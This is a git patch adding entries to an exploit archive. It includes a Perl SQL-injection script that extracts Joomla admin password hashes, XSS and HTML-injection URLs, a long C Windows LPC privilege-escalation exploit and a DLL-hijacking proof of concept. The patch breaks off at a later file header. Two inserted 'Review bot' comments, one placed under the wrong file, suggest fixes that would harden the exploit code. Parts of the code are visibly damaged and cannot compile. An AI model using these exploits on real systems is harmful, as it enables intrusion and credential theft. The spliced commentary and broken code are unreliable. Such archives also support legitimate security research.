From 2a66404f6be21b743fb97d36982ee26f63f8bf3e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 2 Oct 2014 04:44:52 +0000
Subject: [PATCH] Updated 10_02_2014
---
 files.csv | 14 +
 platforms/php/webapps/34820.pl | 33 ++
 platforms/php/webapps/34824.txt | 7 +
 platforms/php/webapps/34825.html | 11 +
 platforms/php/webapps/34826.html | 9 +
 platforms/php/webapps/34827.txt | 9 +
 platforms/php/webapps/34828.txt | 12 +
 platforms/php/webapps/34833.txt | 7 +
 platforms/windows/local/34822.c | 469 +++++++++++++++++++++++++++++
 platforms/windows/remote/34821.txt | 9 +
 platforms/windows/remote/34823.c | 48 +++
 platforms/windows/remote/34829.c | 43 +++
 platforms/windows/remote/34830.c | 48 +++
 platforms/windows/remote/34831.c | 45 +++
 platforms/windows/remote/34832.c | 45 +++
 15 files changed, 809 insertions(+)
 create mode 100755 platforms/php/webapps/34820.pl
 create mode 100755 platforms/php/webapps/34824.txt
 create mode 100755 platforms/php/webapps/34825.html
 create mode 100755 platforms/php/webapps/34826.html
 create mode 100755 platforms/php/webapps/34827.txt
 create mode 100755 platforms/php/webapps/34828.txt
 create mode 100755 platforms/php/webapps/34833.txt
 create mode 100755 platforms/windows/local/34822.c
 create mode 100755 platforms/windows/remote/34821.txt
 create mode 100755 platforms/windows/remote/34823.c
 create mode 100755 platforms/windows/remote/34829.c
 create mode 100755 platforms/windows/remote/34830.c
 create mode 100755 platforms/windows/remote/34831.c
 create mode 100755 platforms/windows/remote/34832.c
diff --git a/files.csv b/files.csv
index 50356dec6..165fe3a8e 100755
--- a/files.csv
+++ b/files.csv
@@ -31348,3 +31348,17 @@ id,file,description,date,author,platform,type,port
 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0
 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0
 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446
+34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component 'cm_id' Parameter SQL Injection Vulnerability",2010-10-06,FL0RiX,php,webapps,0
+34821,platforms/windows/remote/34821.txt,"InstallShield 2009 15.0.0.53 Premier 'ISWiAutomation15.dll' ActiveX Arbitrary File Overwrite Vulnerability",2009-09-15,the_Edit0r,windows,remote,0
+34822,platforms/windows/local/34822.c,"Microsoft Windows Local Procedure Call (LPC) Local Privilege Escalation Vulnerability",2010-09-07,yuange,windows,local,0
+34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-08,anT!-Tr0J4n,windows,remote,0
+34824,platforms/php/webapps/34824.txt,"Lantern CMS '11-login.asp' Cross Site Scripting Vulnerability",2010-10-08,"High-Tech Bridge SA",php,webapps,0
+34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection Vulnerability",2009-06-22,lorddemon,php,webapps,0
+34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 'title.php' Cross Site Scripting Vulnerability",2010-10-08,"Anatolia Security",php,webapps,0
+34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0
+34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 Cross Site Scripting Vulnerabilities",2010-10-06,"High-Tech Bridge SA",php,webapps,0
+34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 'mfc80esn.dll' DLL Loading Arbitrary Code 
Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
+34830,platforms/windows/remote/34830.c,"IsoBuster 2.7 'wnaspi32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
+34831,platforms/windows/remote/34831.c,"NetStumbler 0.4 'mfc71esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
+34832,platforms/windows/remote/34832.c,"Microsoft Visio 2007 'mfc80esn.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-10,Pepelux,windows,remote,0
+34833,platforms/php/webapps/34833.txt,"Joomla! and Mambo 'com_trade' Component 'PID' Parameter Cross Site Scripting Vulnerability",2010-10-11,FL0RiX,php,webapps,0
diff --git a/platforms/php/webapps/34820.pl b/platforms/php/webapps/34820.pl
new file mode 100755
index 000000000..c33581f7b
--- /dev/null
+++ b/platforms/php/webapps/34820.pl
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/43821/info
+
+The Club Manager component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl -w
+
+########################################
+#[~] Author : Fl0riX
+#[!] Script Name: Joomla com_clubmanager
+########################################
+print "\t\t \n\n";
+print "\t\t Fl0rix | Bug Researchers \n\n";
+print "\t\t \n\n";
+print "\t\t Joomla com_clubmanager Remote SQL Injection Exploit \n\n";
+use LWP::UserAgent;
+print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
+chomp(my $target=);
+$florix="concat(username,0x3a,password)";
+$sakkure="jos_users";
+$com="com_clubmanager";
+$cw="+UNION+SELECT+";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/index.php?option=".$com."&tabla=equip&task=presenta&cm_id=284".$cw."1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n\n";
+print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
+}
+else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/34824.txt b/platforms/php/webapps/34824.txt
new file mode 100755
index 000000000..17b95bec8
--- /dev/null
+++ b/platforms/php/webapps/34824.txt
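Review bot: `chomp(my $target=);` is syntactically incomplete — the operand after `=` (a filehandle read in angle brackets, by the look of it) was dropped when the file was archived, so the script as committed does not compile; the same stripping has removed the `#include` operands in 34822.c and 34829.c–34832.c and the template parameter list in 34822.c, so this commit is not a faithful copy of the originals and should be re-checked before the files are trusted as stored. The script runs under `-w` only, with no `use strict`, so `$florix`, `$sakkure`, `$com`, `$cw`, `$b`, `$host`, `$res` and `$answer` are all undeclared package globals; add `use strict;` / `use warnings;` after the shebang, declare each with `my`, and move `use LWP::UserAgent;` above the four `print` statements that precede it. The `$1` capture is consumed in the very next statement, which is fine. For defenders, the string the script sends — `cm_id=284+UNION+SELECT+…+from/**/jos_users+--+` — is the pattern a WAF or IDS signature for this issue would key on.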
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43865/info
+
+Lantern CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/www/html/11-login.asp?intPassedLocationID=57%27%22%3E%3Cscript%3Ealert%2834%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34825.html b/platforms/php/webapps/34825.html
new file mode 100755
index 000000000..cc7497a4a
--- /dev/null
+++ b/platforms/php/webapps/34825.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43871/info
+
+Elgg is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Exploits require the attacker be an authenticated user; this permission may be trivial to acquire.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Elgg 1.0 is vulnerable; other versions may also be affected.
+
+
<------ Eye with this <------ Eye with this <---------Eye with this <---------Eye with this
\ No newline at end of file
diff --git a/platforms/php/webapps/34826.html b/platforms/php/webapps/34826.html
new file mode 100755
index 000000000..4a0191a46
--- /dev/null
+++ b/platforms/php/webapps/34826.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43872/info
+
+OverLook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+OverLook 5.0 is vulnerable; prior versions may also be affected.
+
+ OverLook v5.0 Cross-site Scripting
<--">
\ No newline at end of file
diff --git a/platforms/php/webapps/34827.txt b/platforms/php/webapps/34827.txt
new file mode 100755
index 000000000..2ac8a15cb
--- /dev/null
+++ b/platforms/php/webapps/34827.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43888/info
+
+Recipe Script is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Recipe Script 5.0 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/34828.txt b/platforms/php/webapps/34828.txt
new file mode 100755
index 000000000..5dca0da4d
--- /dev/null
+++ b/platforms/php/webapps/34828.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/43910/info
+
+Backbone Technology Expression is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Backbone Technology Expression 18.09.2010 is vulnerable; other versions may also be affected.
+
+http://www.example.com/?section_copy_id=1005176%27%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
+
+
+http://www.example.com/?section_id=1002815%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
diff --git a/platforms/php/webapps/34833.txt b/platforms/php/webapps/34833.txt
new file mode 100755
index 000000000..90133c097
--- /dev/null
+++ b/platforms/php/webapps/34833.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43915/info
+
+The 'com_trade' component for Joomla! and Mambo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/index.php?option=com_trade&task=product_info&Itemid=florix&PID=[XSS]
\ No newline at end of file
diff --git a/platforms/windows/local/34822.c b/platforms/windows/local/34822.c
new file mode 100755
index 000000000..fc8e3098a
--- /dev/null
+++ b/platforms/windows/local/34822.c
@@ -0,0 +1,469 @@ +source: http://www.securityfocus.com/bid/43860/info + +Microsoft Windows is prone to a local privilege-escalation vulnerability. + +A local attacker can exploit this issue to execute arbitrary code and elevate their privileges to the NetworkService account level. Failed exploit attempts may cause a denial-of-service condition. + +The issue affects Microsoft Windows XP SP3; other versions may also be affected. + +#include +#include +//#include "ntdll.h" +//#pragma comment(lib,"ntdll.lib") +#pragma comment(lib,"advapi32.lib") + +typedef enum _PROCESSINFOCLASS { +ProcessDebugPort=7// 7 Y Y +} PROCESSINFOCLASS; +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING ,*PUNICODE_STRING; +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; +}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID; +#define PORT_NAME_LEN 64 +#define LRPC_CONNECT_REQUEST 0 +#define LPC_CONNECTION_REQUEST 10 +#define offset 0x100+0x4-0x6*4 +#define MAXLEN 0x148 +#define BACKNAME L"\\RPC Control\\back2" +#define RPCLPCNAME L"\\RPC Control\\epmapper" +#define BINDNAME L"back2" +typedef struct _LRPC_BIND_EXCHANGE +{ + INT ConnectType ; + DWORD AssocKey ; + char szPortName[PORT_NAME_LEN] ; + RPC_SYNTAX_IDENTIFIER InterfaceId; + RPC_SYNTAX_IDENTIFIER TransferSyntax; + RPC_STATUS RpcStatus; + unsigned char fBindBack ; + unsigned char fNewSecurityContext ; + unsigned char fNewPresentationContext; + unsigned char PresentationContext; + unsigned char Pad[3]; + unsigned long SecurityContextId; +} LRPC_BIND_EXCHANGE; +typedef struct _LPC_MESSAGE +{ + USHORT DataSize; + USHORT MessageSize; + USHORT MessageType; + USHORT DataInfoOffset; + CLIENT_ID ClientId; + ULONG MessageId; + ULONG SectionSize; +// UCHAR & nbsp; Data[]; +}LPC_MESSAGE, *PLPC_MESSAGE; + +typedef struct _OBJECT_ATTRIBUTES +{ + DWORD Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + DWORD Attributes; + PVOID SecurityDescriptor; + PVOID 
SecurityQualityOfService; +}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES; + +typedef +DWORD +(CALLBACK * NTCREATEPORT)( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectInfoLength, + IN ULONG MaxDataLength, + IN OUT PULONG Reserved OPTIONAL ); +typedef +DWORD +(CALLBACK * NTREPLYWAITRECVIVEPORT)( + IN HANDLE PortHandle, + OUT PHANDLE ReceivePortHandle OPTIONAL, + IN PLPC_MESSAGE Reply OPTIONAL, + OUT PLPC_MESSAGE IncomingRequest ); + +typedef +DWORD +(CALLBACK * NTACCEPTCONNECTPORT) ( + OUT PHANDLE PortHandle, + IN PVOID PortContext OPTIONAL, + IN PLPC_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL, + OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL + ); +typedef +DWORD +(CALLBACK * NTCONNECTPORT)( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT int int1, + // IN OUT PPORT_VIEW ClientView OPTIONAL, + IN OUT int int2, + // IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); +typedef +DWORD +(CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PLPC_MESSAGE Request, + OUT PLPC_MESSAGE IncomingReply ); +typedef +DWORD +(CALLBACK *NTCOMPLETECONNECTPORT) ( + IN HANDLE PortHandle + ); +typedef +DWORD +(CALLBACK *RTLINITUNICODESTRING)( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); +typedef +DWORD +(CALLBACK * NTREPLYPORT)( + IN HANDLE PortHandle, + IN PLPC_MESSAGE Reply ); +typedef +DWORD +(CALLBACK * NTSETINFORMATIONPROCESS)( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength ); + +typedef struct _DEBUG_MESSAGE +{ + LPC_MESSAGE PORT_MSG; + DEBUG_EVENT DebugEvent; +}DEBUG_MESSAGE, 
*PDEBUG_MESSAGE; + +NTSETINFORMATIONPROCESS NtSetInformationProcess; +NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort; +NTCREATEPORT NtCreatePort; +NTREPLYPORT NtReplyPort; +NTCONNECTPORT NtConnectPort; +RTLINITUNICODESTRING RtlInitUnicodeString; +NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort; +NTACCEPTCONNECTPORT NtAcceptConnectPort; +NTCOMPLETECONNECTPORT NtCompleteConnectPort; + +template struct PORT_MESSAGEX : LPC_MESSAGE { +UCHAR Data[i]; +}; +PROCESS_INFORMATION pi; +int server(); +void initapi(); +int main() +{ +// LPC_MESSAGE Reply; +// HMODULE hNtdll; +// DWORD dwAddrList[9]; + BOOL bExit = FALSE; +// DWORD dwRet; +// HANDLE hPort; + int k=0; + unsigned long i; +// DEBUG_MESSAGE dm; + OBJECT_ATTRIBUTES oa = {sizeof(oa)}; + PORT_MESSAGEX<0x130> PortReply,PortRecv; + STARTUPINFO si={sizeof(si)}; + // NTSTATUS + int Status; + + PLPC_MESSAGE Request; +// PLPC_MESSAGE IncomingReply; + LPC_MESSAGE Message; + HANDLE LsaCommandPortHandle; + UNICODE_STRING LsaCommandPortName; + SECURITY_QUALITY_OF_SERVICE DynamicQos; + LRPC_BIND_EXCHANGE BindExchange; + DWORD Key=0x11223344; + unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE); + BindExchange.ConnectType = LRPC_CONNECT_REQUEST ; + BindExchange.AssocKey = Key; +// wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME); + DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation; + DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING; + DynamicQos.EffectiveOnly = TRUE; + initapi(); + printf( "\r\nwindows lpc test!\r\n"); + + CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i); + + + // + // Connect to the Reference Monitor Command Port. This port + // is used to send commands from the LSA to the Reference Monitor. 
+ // + RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME); + Status = NtConnectPort( + &LsaCommandPortHandle, + &LsaCommandPortName, + &DynamicQos, + NULL, + NULL, + NULL, // &maxlen, + &BindExchange, + &Bi ndExchangeLength); + if ((Status)) { + + exit(Status); + //print(("LsapRmInitializeServer - Connect to Rm Command Port failed 0x%lx\n",Status)); + // goto InitServerError; + } + +// exit(0); +/* + //create port + dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0); + if(dwRet != 0) + { + printf("create hPort failed. ret=%.8X\n", dwRet); + return 0; + } + //create process + if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE, + CREATE_SUSPENDED, 0, 0, &si, &pi)) + { + printf("CreateProcess failed:%d\n", GetLastError()); + return 0; + } + //set debug port + dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort, + &hPort, sizeof(hPo rt)); + if(dwRet != 0) + { + printf("set debug port error:%.8X\n", dwRet); + return 0; + } + //printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId, pi.dwProcessId, hPort); + ResumeThread(pi.hThread); +*/ + while (true) + { + memset(&Message, 0, sizeof(Message)); + + Message.MessageSize=0x118; + Message.DataSize=0x100; + Message.MessageId=0x1122; + Request=&Message; + + + + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + PortReply.MessageSize = 0x100; + PortReply.DataSize = 0x100-0x18; + PortReply.MessageType=0; + PortReply.MessageId=0x1122; + PortReply.Data[0]=0x0b; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME); + Sleep(1000); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + PortReply.MessageSize = 0xa0; + PortReply.DataSize = 0xa0-0x18; + PortReply.MessageType=0; + 
PortReply.MessageId=0x1122; + PortReply.Data[0]=0x0; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + memcpy((unsigned char *)&(PortReply.Data[0x0c]), + "\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20); + +//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20); + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + _asm{ + // die: jmp die + } + Sleep(1000); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]); + + if (!(Status)) + { + while(1){ + PortReply.MessageSize = 0x100; + PortReply.DataSize = 0x100-0x18; + PortReply.MessageType=0; + PortReply.MessageId=PortRecv.MessageId; + PortReply.Data[0]=0x01; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0x3; + PortReply.Data[5]=0; + PortReply.Data[6]=0; + + + *(int *)(&(PortReply.Data[0x18]))=*(int *)(&(PortRecv.Data[0x30])); + + _asm{ +// die: jmp die + } + Sleep(100); + Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv); //Reply); + + + Sleep(0x7fffffff); + } + } + } + + + return 0; +} + +int server() +{ + BOOL bExit = FALSE; + DWORD dwRet; +// HANDLE hPort; + int k=0; + unsigned long maxlen; + // DEBUG_MESSAGE dm; + OBJECT_ATTRIBUTES oa = {sizeof(oa)}; + PORT_MESSAGEX<0x130> PortReply,PortRecv; + STARTUPINFO si={sizeof(si)}; + // NTSTATUS + int Status; + + PLPC_MESSAGE Request; + PLPC_MESSAGE IncomingReply; + LPC_MESSAGE Message; + HANDLE BackPortHandle,NewHandle,NewAccHandle; + UNICODE_STRING BackPortName; + SECURITY_QUALITY_OF_SERVICE DynamicQos; + LRPC_BIND_EXCHANGE BindExchange; + DWORD Key=0x11223344; + unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE); + BindExchange.ConnectType = LRPC_CONNECT_REQUEST ; + 
BindExchange.AssocKey = Key; + + DynamicQos.ImpersonationLevel =SecurityAnonymous; // SecurityImpersonation; + DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; //SECURITY_DYNAMIC_TRACKING; + DynamicQos.EffectiveOnly = TRUE; + + + + + RtlInitUnicodeString( &BackPortName,BACKNAME); + memset(&oa,0,sizeof(oa)); + oa.Length=0x18; + oa.ObjectName=&BackPortName; + oa.Attributes=0x40; + + //InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0); + //OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor); + + //create port + dwRet = NtCreatePort(&BackPortHandle, &oa, sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0); + if(dwRet != 0) + { + printf("create hPort failed. ret=%.8X\n", dwRet); + // return 0; + } + + while (true) + { + memset(&Message, 0, sizeof(Message)); + + Message.MessageSize=0x118; + Message.DataSize=0x100; + Message.MessageId=0x11; + Request=&Message; + memset(&PortReply, 0, sizeof(PortReply)); + // memcpy(&PortReply, &dm, sizeof(dm)); + PortReply.MessageSize = 0x148; + PortReply.DataSize = 0x130; + PortReply.MessageType=0; + PortReply.Data[0]=0x0b; + PortReply.Data[1]=0; + PortReply.Data[2]=0; + PortReply.Data[3]=0; + PortReply.Data[4]=0; + + // memcpy(&PortReply.Data[offset-4], &dwAddrList, sizeof(dwAddrList)); + + Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv); //Reply); + if(PortRecv.MessageType==LPC_CONNECTION_REQUEST) + { + Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL); + Status=NtCompleteConnectPort (NewAccHandle); + + memset(&PortRecv, 0, sizeof(PortRecv)); + + Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv); + + while(1) + { + PortRecv.MessageSize = 0x148; + PortRecv.DataSize = 0x130; + + // PortReply.MessageId=PortRecv.MessageId; + _asm{ +//die: jmp die + } + Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv); //&PortReply,&PortRecv); + Sleep(100); + Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv); //&PortReply,&PortRecv); + } + } + } +} + +void initapi() +{ + 
HMODULE hNtdll;
+
+ //get native api address
+ hNtdll = LoadLibrary("ntdll.dll");
+ if(hNtdll == NULL)
+ {
+ printf("LoadLibrary failed:%d\n", GetLastError());
+ }
+ NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
+ GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
+ NtCreatePort = (NTCREATEPORT)
+ GetProcAddress(hNtdll, "NtCreatePort");
+ NtReplyPort = (NTREPLYPORT)
+ GetProcAddress(hNtdll, "NtReplyPort");
+ NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
+ GetProcAddress(hNtdll, "NtSetInformationProcess");
+ NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
+ GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
+
+ NtConnectPort = (NTCONNECTPORT)
+ GetProcAddress(hNtdll, "NtConnectPort");
+ NtCompleteConnectPort = (NTCOMPLETECONNECTPORT)
+ GetProcAddress(hNtdll, "NtCompleteConnectPort");
+ NtAcceptConnectPort = (NTACCEPTCONNECTPORT)
+ GetProcAddress(hNtdll, "NtAcceptConnectPort");
+ RtlInitUnicodeString=(RTLINITUNICODESTRING)
+ GetProcAddress(hNtdll,"RtlInitUnicodeString");
+
+}
+
diff --git a/platforms/windows/remote/34821.txt b/platforms/windows/remote/34821.txt
new file mode 100755
index 000000000..6cdd6254b
--- /dev/null
+++ b/platforms/windows/remote/34821.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43857/info
+
+InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability.
+
+Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control.
+
+InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.
+
+# Part Expl0it & Bug Codes ( Poc ) : ------------------------------------ Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it by : the_Edit0r
\ No newline at end of file
diff --git a/platforms/windows/remote/34823.c b/platforms/windows/remote/34823.c
new file mode 100755
index 000000000..987a7d663
--- /dev/null
+++ b/platforms/windows/remote/34823.c
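Review bot: `initapi()` prints on a `LoadLibrary` failure but does not return, and none of the nine `GetProcAddress` results are checked, so a missing export leaves a null function pointer that `main()` and `server()` then call unconditionally; it should bail out on a null `hNtdll` and test each pointer, e.g. `if (!NtConnectPort || !NtCreatePort || !RtlInitUnicodeString) { printf("ntdll export missing\n"); exit(1); }`, extended to the other six. `server()` is declared `int` but has no `return`; `bExit`, `k`, `si`, `Request` and `IncomingReply` are set and never read; and the `Sleep(0x7fffffff)` inside the innermost loop means the process never exits on its own. The archived text is also damaged in ways the commit does not show — both `#include` operands and the `template` parameter list before `struct PORT_MESSAGEX` are gone and identifiers are split by stray spaces (`Bi ndExchangeLength`, `hPo rt`) — so the file cannot be compiled as stored and should be re-checked against the original. From a detection standpoint, the concrete artefacts on the page are the port names: the process creates `\RPC Control\back2` through `NtCreatePort` and then connects to `\RPC Control\epmapper`, so an unprivileged process creating a port under `\RPC Control` and immediately connecting to the endpoint-mapper port is what a host sensor could flag.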
@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/43863/info
+
+Dupehunter Professional is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+Dupehunter Professional 9.0.0.3911 is vulnerable; other versions may also be affected.
+
+/*
+#Dupehunter Professional DLL Hijacking Exploit (fwpuclnt.dll)
+#Author : anT!-Tr0J4n
+#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
+#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
+#Software Link:http://www.dupehunter.com
+#Tested on: Windows XP sp3
+# Home : www.Dev-PoinT.com
+
+#####################
+How TO use : Compile and rename to " fwpuclnt.dll " , create a file in the same dir with one of the following extensions.
+check the result > Hack3d
+#####################
+
+#fwpuclnt.dll (code)
+*/
+
+#include "stdafx.h"
+
+void init() {
+MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
+}
+
+
+BOOL APIENTRY DllMain( HANDLE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+ )
+{
+ switch (ul_reason_for_call)
+{
+case DLL_PROCESS_ATTACH:
+ init();break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+break;
+ }
+ return TRUE;
+}
diff --git a/platforms/windows/remote/34829.c b/platforms/windows/remote/34829.c
new file mode 100755
index 000000000..dcda21daf
--- /dev/null
+++ b/platforms/windows/remote/34829.c
